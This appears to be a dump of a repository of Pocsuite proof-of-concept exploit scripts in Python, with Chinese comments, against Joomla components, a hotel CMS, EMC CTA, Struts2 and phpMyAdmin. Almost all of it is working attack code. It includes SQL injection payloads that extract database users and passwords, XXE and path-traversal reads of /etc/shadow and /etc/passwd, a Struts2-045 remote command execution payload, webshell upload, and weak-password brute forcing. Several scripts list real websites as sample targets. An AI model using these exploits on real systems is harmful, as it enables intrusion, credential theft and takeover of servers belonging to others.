52 | result['VerifyInfo']['data'] = string
53 | return self.parse_result(result)
54 |
55 | def parse_result(self, result):
56 | output = Output(self)
57 |
58 | if result:
59 | output.success(result)
60 | else:
61 | output.fail("Internet Nothing returned")
62 | return output
63 |
64 | register(Fuckdede)
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/BookingeCMS HotelCMS酒店预订管理系统key和m=info.detail id存在注入.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import re
4 | from pocsuite.api.request import req
5 | from pocsuite.api.poc import register
6 | from pocsuite.api.poc import Output, POCBase
7 |
8 |
9 | class TestPOC(POCBase):
10 | vulID = '' # ssvid
11 | version = '1.0'
12 | author = ['kenan']
13 | vulDate = ''
14 | createDate = '2016-06-06'
15 | updateDate = '2016-06-06'
16 | references = ['http://www.seebug.org/vuldb/ssvid-']
17 | name = ''
18 | appPowerLink = ''
19 | appName = ''
20 | appVersion = ''
21 | vulType = ''
22 | desc = '''
23 | '''
24 | samples = ['']
25 | install_requires = ['']
26 | #请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
27 |
28 | def _attack(self):
29 | result = {}
30 | #Write your code here
31 | vulurl = "%s" % self.url
32 | payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
33 | resp = req.get(vulurl+ payload)
34 | re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
35 | vulurl1 = "%s/?m=city.getSearch&index=xx" % self.url
36 | payload1 = {"key":"xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"}
37 | resp1 = req.post(vulurl,data =payload1)
38 | re_result1 = re.findall(r'~~~(.*?)~~~', resp1.content, re.S|re.I)
39 | if re_result :
40 | result['VerifyInfo'] = {}
41 | result['VerifyInfo']['URL'] = vulurl
42 | result['VerifyInfo']['Payload'] = payload
43 | return self.parse_output(result)
44 | if re_result1 :
45 | result['VerifyInfo'] = {}
46 | result['VerifyInfo']['URL'] = vulurl1
47 | result['VerifyInfo']['Payload'] = payload1
48 | return self.parse_output(result)
49 |
50 | def _verify(self):
51 | result = {}
52 | return self._attack()
53 |
54 | def parse_output(self, result):
55 | #parse output
56 | output = Output(self)
57 | if result:
58 | output.success(result)
59 | else:
60 | output.fail('Internet nothing returned')
61 | return output
62 |
63 |
64 | register(TestPOC)
--------------------------------------------------------------------------------
/EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '85903' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2014-04-16'
13 | createDate = '2015-11-12'
14 | updateDate = '2015-11-12'
15 | references = ['http://www.sebug.net/vuldb/ssvid-85903']
16 | name = 'EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read'
17 | appPowerLink = 'N/A'
18 | appName = 'EMC Cloud Tiering Appliance'
19 | appVersion = '10.0'
20 | vulType = 'XXE'
21 | desc = '''
22 | EMC Cloud Tiering Appliance(CTA)是美国易安信(EMC)公司的一套基于策略的文件分层、
23 | 归档和迁移解决方案。该方案通过自动化文件分层、文件归档和文件迁移等功能优化网络存储(NAS)基础架构。
24 | 该架构的v10.0版本的/api/login处存在XXE漏洞,导致可以读取任意文件
25 | '''
26 | samples = ['']
27 |
28 | def _attack(self):
29 | result = {}
30 | return self.parse_output(result)
31 |
32 | def _verify(self):
33 | result = {}
34 | #下面以尝试读取/etc/shadow为例子进行测试
35 | filename='/etc/shadow'
36 | payload=r''\
37 | ''\
38 | ''\
40 | ']>' \
41 | ''\
42 | 'root'\
43 | 'root'\
44 | ''.format(file=filename)
45 |
46 | expurl='{url}/api/login'.format(url=self.url)
47 | try:
48 | response=req.post(expurl,data=payload,headers=self.headers, timeout=50)
49 | if re.match('root:.+?:0:0:.+?:.+?:.+?', response.content) and response.status_code==200:
50 | result['VerifyInfo'] = {}
51 | result['VerifyInfo']['URL'] = expurl
52 | result['Fileinfo']['Filename']=filename
53 | result['Fileinfo']['Content']=response.content
54 | else:
55 | result={}
56 | except:
57 | result={}
58 | return self.parse_output(result)
59 |
60 | def parse_output(self, result):
61 | #parse output
62 | output = Output(self)
63 | if result:
64 | output.success(result)
65 | else:
66 | output.fail('Internet nothing returned')
67 | return output
68 |
69 |
70 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_carman Cross Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '18676' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2009-12-24'
13 | createDate = '2016-01-21'
14 | updateDate = '2016-01-21'
15 | references = ['http://www.sebug.net/vuldb/ssvid-18676']
16 | name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla!'
19 | appVersion = 'N/A'
20 | vulType = 'XSS'
21 | desc = '''
22 | Joomla组件com_carman由于参数msg过滤不严格,导致出现反射性XSS漏洞。
23 |
24 | 该漏洞利用的POC格式如下:
25 | http://XXX/index.php?option=com_carman&msg=">
26 |
27 | 该漏洞在Firefox浏览器下利用与验证的效果截图如下所示:
28 | (1)http://pan.baidu.com/s/1c0OnfWk
29 | (2)http://pan.baidu.com/s/1skl3ifb
30 | '''
31 | samples = ['http://carrentalsltd.com']
32 |
33 | def _attack(self):
34 | return self._verify()
35 |
36 | def _verify(self):
37 | #验证漏洞
38 | result = {}
39 | #特征字符串
40 | strxss="<0x!Q_az*^~>"
41 | #构造XSS验证的payload
42 | payload='">'
43 | #漏洞访问地址
44 | exploit='/index.php?option=com_carman&msg='
45 | #自定义的HTTP头
46 | httphead = {
47 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
48 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
49 | 'Connection':'keep-alive',
50 | "Content-Type": "application/x-www-form-urlencoded"
51 | }
52 | #构造访问地址
53 | vulurl=self.url+exploit+payload
54 | #访问
55 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
56 | #判断返回结果
57 | if resp.status_code==200 and '' in resp.content:
58 | #漏洞验证成功
59 | result['VerifyInfo']={}
60 | result['VerifyInfo']['URL'] =self.url+exploit
61 | result['VerifyInfo']['Payload'] = payload
62 | return self.parse_output(result)
63 |
64 | def parse_output(self, result):
65 | #parse output
66 | output = Output(self)
67 | if result:
68 | output.success(result)
69 | else:
70 | output.fail('Internet nothing returned')
71 | return output
72 |
73 |
74 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_job (showMoreUse) SQL injection vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | import re
8 |
9 | class TestPOC(POCBase):
10 | vulID = '67141' # ssvid
11 | version = '1.0'
12 | author = ['hhxx']
13 | vulDate = '2009-12-08'
14 | createDate = '2016-01-14'
15 | updateDate = '2016-01-14'
16 | references = ['http://www.sebug.net/vuldb/ssvid-67141']
17 | name = 'Joomla Component com_job (showMoreUse) SQL injection vulnerability'
18 | appPowerLink = 'http://www.joomla.org'
19 | appName = 'Joomla Component com_job'
20 | appVersion = 'N/A'
21 | vulType = 'SQL injection'
22 | desc = u'''
23 | Joomla! Component com_job 组件'index.php' SQL注入漏洞
24 | Joomla! Component com_job 组件的index.php中存在SQL注入漏洞。
25 | 远程攻击者可以借助一个option操作中的id参数,执行任意SQL指令。
26 | '''
27 | samples = ['']
28 |
29 | def _attack(self):
30 | result = {}
31 | payload = '/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,%s,17,18,19,20,21,22,23,24,25+from+kew_users--'
32 | payload = payload % 'concat(0x757365723d,username,0x3a,0x70617373776f72643d,password,0x3a)'
33 | vul_url = '%s%s' % (self.url,payload)
34 | res = req.get(vul_url,timeout = 10)
35 | Username = re.search("(user=(?P.*?):)",res.content)
36 | Password = re.search("(password=(?P.*?):)",res.content)
37 | if Username and Password:
38 | result['Database'] = {}
39 | result['Database']['Username'] = Username.group("username")
40 | result['Database']['Password'] = Password.group("password")
41 | return self.parse_output(result)
42 |
43 | def _verify(self):
44 | result = {}
45 | payload = '/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,%s,17,18,19,20,21,22,23,24,25+from+kew_users--'
46 | payload = payload % 'md5(1)'
47 | vul_url = '%s%s' % (self.url,payload)
48 | res = req.get(vul_url,timeout = 10)
49 | if 'c4ca4238a0b923820dcc509a6f75849b' in res.content:
50 | result['VerifyInfo'] = {}
51 | result['VerifyInfo']['URL'] = self.url + payload
52 | return self.parse_output(result)
53 |
54 | def parse_output(self, result):
55 | #parse output
56 | output = Output(self)
57 | if result:
58 | output.success(result)
59 | else:
60 | output.fail('Internet nothing returned')
61 | return output
62 |
63 | register(TestPOC)
--------------------------------------------------------------------------------
/joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '72776' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2011-11-29'
13 | createDate = '2016-01-24'
14 | updateDate = '2016-01-24'
15 | references = ['http://www.seebug.org/vuldb/ssvid-72776']
16 | name = 'joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'joomla component The Estate Agent '
19 | appVersion = 'N/A'
20 | vulType = 'SQL injection'
21 | desc = '''
22 | joomla component The Estate Agent对参数id过滤不严,导致出现SQL注入漏洞。
23 | 远程攻击者可以利用回显报错等方式,执行SQL指令,获取敏感信息。
24 | '''
25 | samples = ['http://www.loyolapropiedades.com.ar']
26 |
27 | def _attack(self):
28 | #利用SQL注入读取数据库信息
29 | result = {}
30 | #访问的地址
31 | exploit='/index.php?option=com_estateagent&act=cat&task=showCE&id='
32 | #利用Union方式读取信息
33 | payload="1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
34 | "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "\
35 | "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -"
36 | #构造漏洞利用连接
37 | vulurl=self.url+exploit+payload
38 | #自定义的HTTP头
39 | httphead = {
40 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
41 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
42 | 'Connection':'keep-alive'
43 | }
44 | #提取信息的正则表达式
45 | parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
46 | #发送请求
47 | resp=req.get(url=vulurl,headers=httphead,timeout=80)
48 | #检查是否含有特征字符串
49 | if '$~~~$' in resp.content:
50 | #提取信息
51 | match=re.search(parttern,resp.content,re.M|re.I)
52 | if match:
53 | #漏洞利用成功
54 | result['DbInfo']={}
55 | #数据库用户名
56 | result['DbInfo']['Username']=match.group(1)
57 | #数据库版本
58 | result['DbInfo']['Version']=match.group(2)
59 | return self.parse_output(result)
60 |
61 | def _verify(self):
62 | return self._attack()
63 |
64 | def parse_output(self, result):
65 | #parse output
66 | output = Output(self)
67 | if result:
68 | output.success(result)
69 | else:
70 | output.fail('Internet nothing returned')
71 | return output
72 |
73 |
74 | register(TestPOC)
--------------------------------------------------------------------------------
/_180323_170928_Struts2_045_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.api.request import req
4 | from pocsuite.api.poc import register
5 | from pocsuite.api.poc import Output, POCBase
6 | from pocsuite.api.utils import getWeakPassword
7 |
8 |
9 | class TestPOC(POCBase):
10 | vulID = '00004'
11 | version = '1.0'
12 | author = ['jeffzhang']
13 | vulDate = '2017-09-28'
14 | createDate = '2017-09-28'
15 | updateDate = '2017-09-28'
16 | references = ['']
17 | name = 'Struts2-045 命令执行漏洞'
18 | appPowerLink = 'http://www.phpMyAdmin.com/'
19 | appName = 'Apache Struts'
20 | appVersion = '<=2.3.32'
21 | vulType = 'RCE'
22 | desc = '''
23 | 程攻击者可通过发送恶意的数据包在受影响服务器上执行任意命令
24 | '''
25 | samples = ['']
26 |
27 | def _attack(self):
28 | return self._verify()
29 |
30 | def _verify(self):
31 | result = {}
32 | command = "echo 89aifh76ftq4fu38yfq498yf"
33 | payload = "Content-Type:%{(#_='multipart/form-data')."
34 | payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
35 | payload += "(#_memberAccess?"
36 | payload += "(#_memberAccess=#dm):"
37 | payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
38 | payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
39 | payload += "(#ognlUtil.getExcludedPackageNames().clear())."
40 | payload += "(#ognlUtil.getExcludedClasses().clear())."
41 | payload += "(#context.setMemberAccess(#dm))))."
42 | payload += "(#cmd='%s')." % command
43 | payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
44 | payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
45 | payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
46 | payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
47 | payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
48 | payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
49 | payload += "(#ros.flush())}"
50 | headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
51 |
52 | response = req.post(self.url, headers=headers)
53 | if "89aifh76ftq4fu38yfq498yf" in response.content:
54 | result['VerifyInfo'] = {}
55 | result['VerifyInfo']['URL'] = response.url
56 | return self.parse_output(result)
57 |
58 | def parse_output(self, result):
59 | # parse output
60 | output = Output(self)
61 | if result:
62 | output.success(result)
63 | else:
64 | output.fail('Internet nothing returned')
65 | return output
66 |
67 |
68 | register(TestPOC)
69 |
--------------------------------------------------------------------------------
/EZ-Oscommerce 3.1 - Remote File Upload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import string
4 | import random
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 | from pocsuite.lib.utils.webshell import PhpVerify, PhpShell
9 | from pocsuite.lib.utils.password import genPassword
10 |
11 |
12 | class TestPOC(POCBase):
13 | vulID = '69439' # ssvid
14 | version = '1.0'
15 | author = ['0xFATeam']
16 | vulDate = ''
17 | createDate = '2016-01-16'
18 | updateDate = '2016-01-16'
19 | references = ['http://www.sebug.net/vuldb/ssvid-69439']
20 | name = 'EZ-Oscommerce 3.1 - Remote File Upload'
21 | appPowerLink = 'http://www.ezosc.com'
22 | appName = 'Oscommerce'
23 | appVersion = '3.1'
24 | vulType = 'File Upload'
25 | desc = '''
26 | '''
27 | samples = ['']
28 |
29 | def _attack(self):
30 | result = {}
31 |
32 | vul_url = '/admin/file_manager.php'
33 | params = {'action': 'save'}
34 |
35 | webshell = PhpShell()
36 | webshell.set_pwd(genPassword(6))
37 | filename = ''.join([random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
38 | content = webshell.get_content()
39 | data = {
40 | 'filename': filename,
41 | 'file_contents': content,
42 | 'submit': ''
43 | }
44 |
45 | req.post(self.url + vul_url, params=params, data=data)
46 | if webshell.check(self.url + ('/%s' % filename)):
47 | result['ShellInfo'] = {}
48 | result['ShellInfo']['URL'] = self.url + ('/%s' % filename)
49 | result['ShellInfo']['Content'] = content
50 |
51 | return self.parse_output(result)
52 |
53 | def _verify(self):
54 | result = {}
55 | vul_url = '/admin/file_manager.php'
56 | params = {'action': 'save'}
57 |
58 | webshell = PhpVerify()
59 | filename = ''.join([random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php'
60 | content = webshell.get_content()
61 | data = {
62 | 'filename': filename,
63 | 'file_contents': content,
64 | 'submit': ''
65 | }
66 |
67 | response = req.post(self.url + vul_url, params=params, data=data)
68 | if webshell.check(self.url + ('/%s' % filename)):
69 | result['VerifyInfo'] = {}
70 | result['VerifyInfo']['URL'] = response.url
71 |
72 | return self.parse_output(result)
73 |
74 | def parse_output(self, result):
75 | #parse output
76 | output = Output(self)
77 | if result:
78 | output.success(result)
79 | else:
80 | output.fail('Internet nothing returned')
81 | return output
82 |
83 |
84 | register(TestPOC)
--------------------------------------------------------------------------------
/_141017_phpMyAdmin_all_weak_password.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.api.request import req
4 | from pocsuite.api.poc import register
5 | from pocsuite.api.poc import Output, POCBase
6 | from pocsuite.api.utils import getWeakPassword
7 |
8 |
9 | class TestPOC(POCBase):
10 | vulID = '00003'
11 | version = '1.0'
12 | author = ''
13 | vulDate = '2013-04-23'
14 | createDate = '2016-03-07'
15 | updateDate = '2016-03-07'
16 | references = ''
17 | name = 'phpMyAdmin 弱密码漏洞'
18 | appPowerLink = 'http://www.phpMyAdmin.com/'
19 | appName = 'phpMyAdmin'
20 | appVersion = 'ALL'
21 | vulType = 'Weak Password'
22 | desc = '''
23 | phpMyAdmin弱口令登录,从而导致攻击者可据此信息进行后续攻击。
24 | '''
25 | samples = ['']
26 |
27 | def _attack(self):
28 | return self._verify()
29 |
30 | def _verify(self):
31 | result = {}
32 | flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
33 | 'class="disableAjax" title=']
34 | user_list = ['root', 'admin']
35 | password_list = ['root', '123456', '12345678', 'password', 'passwd', '123']
36 | try:
37 | response = req.get(self.url)
38 | if 'name=\"phpMyAdmin\"' in response.content:
39 | target_url = str(self.url) + "/index.php"
40 | else:
41 | response = req.get(self.url + '/phpmyadmin/index.php')
42 | if 'input_password' in response.content and 'name="token"' in response.content:
43 | target_url = self.url + "/phpmyadmin/index.php"
44 | except Exception as e:
45 | pass
46 |
47 | for user in user_list:
48 | for password in password_list:
49 | payload_data = "pma_username=" + str(user.strip()) + "&pma_password=" + str(password.strip()) + "" \
50 | "&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci"
51 | try:
52 | respond = req.post(target_url, data=payload_data)
53 | for flag in flag_list:
54 | if flag in respond.content:
55 | result['VerifyInfo'] = {}
56 | result['VerifyInfo']['URL'] = target_url
57 | result['VerifyInfo']['Payload'] = payload_data
58 | except Exception as e:
59 | # print(e)
60 | pass
61 | return self.parse_output(result)
62 |
63 | def parse_output(self, result):
64 | # parse output
65 | output = Output(self)
66 | if result:
67 | output.success(result)
68 | else:
69 | output.fail('Internet nothing returned')
70 | return output
71 |
72 |
73 | register(TestPOC)
74 |
--------------------------------------------------------------------------------
/Joomla Component simpledownload 0.9.5 - LFI Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '68620' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2010-06-01'
13 | createDate = '2016-01-23'
14 | updateDate = '2016-01-23'
15 | references = ['http://www.seebug.org/vuldb/ssvid-68620']
16 | name = 'Joomla Component simpledownload 0.9.5 - LFI Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla Component simpledownload'
19 | appVersion = '0.9.5'
20 | vulType = 'LFI'
21 | desc = '''
22 | Joomla 组件simpledownload 0.9.5版本由于对参数controller过滤不严格,导致存在本地文件包含漏洞,
23 | 在满足以下两个条件的前提下,可以结合%00截断,实现该漏洞的利用。
24 | (1)magic_quotes_gpc=off
25 | (2)PHP版本小于5.3.4
26 |
27 | 该处漏洞读取/etc/passwd文件内容的POC格式如下:
28 | http://XXX.com/index.php?option=com_simpledownload
29 | &controller=../../../../../../../../../../../../../../../etc/passwd%00
30 | '''
31 | samples = ['http://tdctema.org']
32 |
33 | def _attack(self):
34 | return self._verify()
35 |
36 | def _verify(self):
37 | #利用LFI漏洞下载/etc/passwd文件
38 | result ={}
39 | #文件名称
40 | filename='/etc/passwd'
41 | #漏洞利用的地址
42 | payload='/index.php?option=com_simpledownload&controller='
43 | #..的个数
44 | dots='../'*14+'..'
45 | #截断符
46 | dBs='%00'
47 | #自定义的HTTP头
48 | httphead = {
49 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
50 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
51 | 'Connection':'keep-alive'
52 | }
53 | #自定义的超时信息
54 | time=50
55 | #构造访问连接地址
56 | vulurl=self.url+payload+dots+filename+dBs
57 | #发送请求
58 | resp=req.get(url=vulurl,headers=httphead,timeout=time)
59 | #判断返回页面内容
60 | if resp.status_code==200:
61 | #匹配内容
62 | match=re.search('nobody:.+?:[0-9]+:[0-9]+:.*:.*:.*', resp.content,re.S|re.M)
63 | if match:
64 | #提取文件内容成功
65 | result['VerifyInfo'] = {}
66 | result['VerifyInfo']['URL'] = vulurl
67 | result['FileInfo']={}
68 | result['FileInfo']['Filename']=filename
69 | result['FileInfo']['Content']=match.group(0)[:48]+'...'
70 | return self.parse_output(result)
71 |
72 | def parse_output(self, result):
73 | #parse output
74 | output = Output(self)
75 | if result:
76 | output.success(result)
77 | else:
78 | output.fail('Internet nothing returned')
79 | return output
80 |
81 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component (com_jimtawl) Local File Inclusion Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '70258' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2011-03-23'
13 | createDate = '2016-02-13'
14 | updateDate = '2016-02-13'
15 | references = ['http://www.seebug.org/vuldb/ssvid-70258']
16 | name = 'Joomla Component (com_jimtawl) Local File Inclusion Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla Component (com_jimtawl)'
19 | appVersion = '1.0.2'
20 | vulType = 'Local File Inclusion'
21 | desc = '''
22 | Joomla!的 Jimtawl(com_jimtawl)组件1.0.2版本中存在目录遍历漏洞。
23 | 远程攻击者可以借助向index.php传递的task参数中的“..”操作符,
24 | 读取任意文件或者可能引起其他未明影响。
25 |
26 | 该漏洞利用成功需要具备两个条件:
27 | (1)magic_quotes_gpc=off
28 | (2)PHP小于5.3.4
29 |
30 | 该漏洞读取/etc/passwd的POC如下:
31 | http://***/index.php?option=com_jimtawl&Itemid=12&task=
32 | ../../../../../../../../../../../../../../../etc/passwd%00
33 |
34 | 验证效果图如下所示:
35 | http://pan.baidu.com/s/1jHhgSKm
36 | '''
37 | samples = ['http://www.atbc.net.au']
38 |
39 | def _attack(self):
40 | return self._verify()
41 |
42 | def _verify(self):
43 | #尝试利用LFI来读取/etc/passwd的内容
44 | result = {}
45 | #读取的文件名
46 | filename='/etc/passwd'
47 | #漏洞路径
48 | exploit='/index.php?option=com_jimtawl&Itemid=12&task='
49 | #截断符号
50 | dBs='%00'
51 | #..的个数
52 | dots='../../../../../../../../../../../../../../..'
53 | #漏洞利用地址
54 | vulurl=self.url+exploit+dots+filename+dBs
55 | #伪造的HTTP头
56 | httphead = {
57 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
58 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
59 | 'Connection':'keep-alive'
60 | }
61 | #发送请求,并返回结果
62 | resp=req.get(vulurl,headers=httphead,timeout=50)
63 | #根据状态码和返回文件的内容,判断是否利用成功
64 | if resp.status_code==200 and re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content):
65 | result['VerifyInfo'] = {}
66 | result['VerifyInfo']['URL'] = vulurl
67 | #记录文件内容
68 | result['Fileinfo']={}
69 | result['Fileinfo']['Filename']=filename
70 | result['Fileinfo']['Content']=resp.content[0:32]+'...'
71 | return self.parse_output(result)
72 |
73 | def parse_output(self, result):
74 | #parse output
75 | output = Output(self)
76 | if result:
77 | output.success(result)
78 | else:
79 | output.fail('Internet nothing returned')
80 | return output
81 |
82 |
83 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component (com_ezautos) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '69896' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2011-10-09'
13 | createDate = '2016-01-09'
14 | updateDate = '2016-01-09'
15 | references = ['http://www.sebug.net/vuldb/ssvid-69896']
16 | name = 'Joomla Component (com_ezautos) SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.com'
18 | appName = 'Joomla'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | joomla组件com_ezautos存在SQL注入漏洞,
23 | 远程攻击者可借助index.php中的helpers操作的firstCode参数执行任意SQL命令。
24 | '''
25 | samples = ['http://www.auto-tradelink.co.uk']
26 |
27 | def _attack(self):
28 | #利用注入漏洞读取数据库信息
29 | result = {}
30 | #利用的payload
31 | payload="1+and+0+union+select+1,2,concat('$~~~$',version(),'***',user(),'$~~~$'),4,5,6,7--"
32 | #漏洞地址
33 | exploit='/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='
34 | #构造访问地址
35 | vulurl=self.url+exploit+payload
36 | #自定义的HTTP头
37 | httphead = {
38 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
39 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
40 | 'Connection':'keep-alive'
41 | }
42 | #正则表达式
43 | par="\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$"
44 | #访问
45 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
46 | #检查是否有特殊字符串
47 | if '$~~~$' in resp.content:
48 | match=re.search(par,resp.content,re.I|re.M)
49 | if match:
50 | #漏洞利用成功
51 | result['DatabaseInfo']={}
52 | #数据库版本
53 | result['DatabaseInfo']['Version']=match.group(1)
54 | #数据库用户
55 | result['DatabaseInfo']['Username']=match.group(2)
56 | return self.parse_output(result)
57 |
58 | def _verify(self):
59 | #利用注入漏洞计算md5(1)
60 | result = {}
61 | #利用的payload
62 | payload='1+and+0+union+select+1,2,md5(1),4,5,6,7--'
63 | #漏洞地址
64 | exploit='/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='
65 | #构造访问地址
66 | vulurl=self.url+exploit+payload
67 | #自定义的HTTP头
68 | httphead = {
69 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
70 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
71 | 'Connection':'keep-alive'
72 | }
73 | #访问
74 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
75 | #检查是否有特殊字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
76 | if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
77 | #漏洞验证成功
78 | result['VerifyInfo']={}
79 | result['VerifyInfo']['URL'] = self.url+exploit
80 | result['VerifyInfo']['Payload'] = payload
81 | return self.parse_output(result)
82 |
83 | def parse_output(self, result):
84 | #parse output
85 | output = Output(self)
86 | if result:
87 | output.success(result)
88 | else:
89 | output.fail('Internet nothing returned')
90 | return output
91 |
92 |
93 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_doqment (cid) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
